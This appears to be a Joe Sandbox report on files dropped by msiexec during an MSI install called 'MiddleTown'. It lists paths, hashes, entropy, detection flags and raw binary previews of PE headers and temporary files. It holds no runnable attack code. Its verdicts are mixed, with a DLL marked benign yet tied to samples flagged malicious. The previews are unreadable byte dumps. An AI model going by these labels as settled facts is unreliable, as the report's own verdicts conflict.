                                                                                                                                          MD5:8CB04BF931A19FA0AE1BD7235180DD4A
                                                                                                                                          SHA1:DFC980A827DBDE294AE9FA6E63545D1D57344E96
                                                                                                                                          SHA-256:DFFF1A07429FF9585F3DAB9C78B501174E7C326E1FB95C5234368071B5426768
                                                                                                                                          SHA-512:58F1661D689AAA9391F04E086DB490693F83B70E068CA10B20CFF6F87979A8804AA9F054AC961AF06C4B7B17FD88B1912774B2EB3D16B9DF8E7A4ED9BB3C0A29
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:......................>...................!...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...............................................................................................................................................................................................................................................................................................................................<...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...;...?...5...6...7...8...9...:.......=.......>.......@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                          C:\Windows\Installer\MSI8D3A.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):446944
                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: lavi.msi, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                                                                                                                          • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                          • Filename: net.msi, Detection: malicious, Browse
                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious, Browse
                                                                                                                                          • Filename: 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi, Detection: malicious, Browse
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\MSI8D89.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):446944
                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\MSI8DD8.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):446944
                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\MSI8E17.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):446944
                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\MSI8E67.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):400974
                                                                                                                                          Entropy (8bit):6.591604107980969
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:YMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO17:YMvZx0FlS68zBQSncb4ZPQTpAjZxqO17
                                                                                                                                          MD5:69BFAE364F0238366C696EED384C7267
                                                                                                                                          SHA1:297D315A73112492E3CDD752DA82B7622FD72730
                                                                                                                                          SHA-256:26C13BEAD028EDE8A9E2D0F0DF8DCA6934405ED4F89407045D5A8C89005E6A2F
                                                                                                                                          SHA-512:F3EA5081B0923F123BD8880FF90531E3AE2B8D82A8DBB0A008704644DFCCB8182CE764FB4C461BF358AB61DCD34EB74CBE7AEC85D2AA5B6BAD4A440FA1D84A44
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...@IXOS.@.....@.bmY.@.....@.....@.....@.....@.....@......&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}..MiddleTown..medk.msi.@.....@C....@.....@........&.{B4021E8B-3405-4502-A951-957A46D23C96}.....@.....@.....@.....@.......@.....@.....@.......@......MiddleTown......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}(.01:\Software\MSER LTD\MiddleTown\Version.@.......@.....@.....@......&.{C38A4B2A-9F83-4A9D-8505-10020DD6ABA7}).C:\Users\user\AppData\Roaming\tab.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......".C:\Users\

                                                                                                                                          C:\Windows\Installer\MSI8F42.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):399328
                                                                                                                                          Entropy (8bit):6.589290025452677
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                          MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                          SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                          SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                          SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\SourceHash{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.1616295808993868
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:JSbX72FjgAGiLIlHVRpzh/7777777777777777777777777vDHFh6Afrp01l0i8Q:JqQI53j6Afu8F
                                                                                                                                          MD5:35CBBBE24CE0DB47ABB34B773B84A3C5
                                                                                                                                          SHA1:DFD773A0513DD7A557F3E523906E59CBB1809F19
                                                                                                                                          SHA-256:1D833DEB3188B4E1F5157A437FAC11010BB8DD27E568BB326B49B0D1BC0E9C86
                                                                                                                                          SHA-512:77CEFCE6117F3EC4B91F75CCFC77BB2D737FCED21EC63E4BDD39D872D0B555ED815F0B31F1AEB748FE4952B24EFEBB2FDC8A10F46634B45460A5326CE22E7113
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):360001
                                                                                                                                          Entropy (8bit):5.362993320142039
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau3:zTtbmkExhMJCIpES
                                                                                                                                          MD5:5D857E6132FB1F927D7CDEB770961986
                                                                                                                                          SHA1:983BC1F7C377DD2C68B0AD1FCF9921F945C99BFC
                                                                                                                                          SHA-256:95405CA58DFC5DB762B9A370B0CC797632E4EEC95EF6A8D91027A0AFA7FB360B
                                                                                                                                          SHA-512:85DFA77BAEB8F74EB189A139A114876EABB7F27D9E21860EECCEB4B6737574D5F299C3B64A3A47A5831B365B852117C357B26779803F5690957837D8EECA1F3A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                          C:\Windows\Temp\~DF3166D2D7A57CC204.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DF4DA8C45DC3BE49B0.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):0.12699872131171566
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:XIgmrlTxkjyipVkj4kjyipVkjAAEVkyjCysVgwGHGc+KV:XUrlTXS7StAEbCys9cdV
                                                                                                                                          MD5:A1CE4CA213F54A0FF7B3DACF158F2517
                                                                                                                                          SHA1:3DA5297AEF9C725EFF62D2CD8D06A64FB77F54E1
                                                                                                                                          SHA-256:A40AF882DA535E7FCA1E6553ABFF88F3A966059477E3B563078E0F1B968F923F
                                                                                                                                          SHA-512:1556C9079C460F4097FC70C8518F667D75B055477ECBF5EA22559E0F734232E38DCF6540410F73E182674175C26B31F8C15C32C4C64837631F0DE16355821D5F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DF912E814799C9CDAF.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFA5E5BD148ABA60C5.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFACD0A0C1364FE83A.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFB2079EC14A68F18E.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFC990E71EF06BC614.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):0.06841213452055567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOhB+zAfEoVky6l0t/:2F0i8n0itFzDHFh6Afu01
                                                                                                                                          MD5:2DE69A9759A7B86DD64B57CD981F6D1D
                                                                                                                                          SHA1:8A4F79A3E2A048DC9C3AF5AAC27D105621A63E49
                                                                                                                                          SHA-256:F18F8AACCDD5D086414CEF2DB41E86F390100424A8E2F4460924AB60723D4E22
                                                                                                                                          SHA-512:61A6EC8C8E6ABB95E7E21ABCF9B2B749D1D212E4F5CB36580CC0DDC335433BD3113B741E931944BABC736603316852A100E72398D928591554C039643B9AEFC8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFDAE0855863EEBFBF.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFECA7083ED7F1D401.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFF91C25B06241A485.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFFA1812524C7E18E3.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Temp\~DFFF3DAD5D01C02B9C.TMP

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
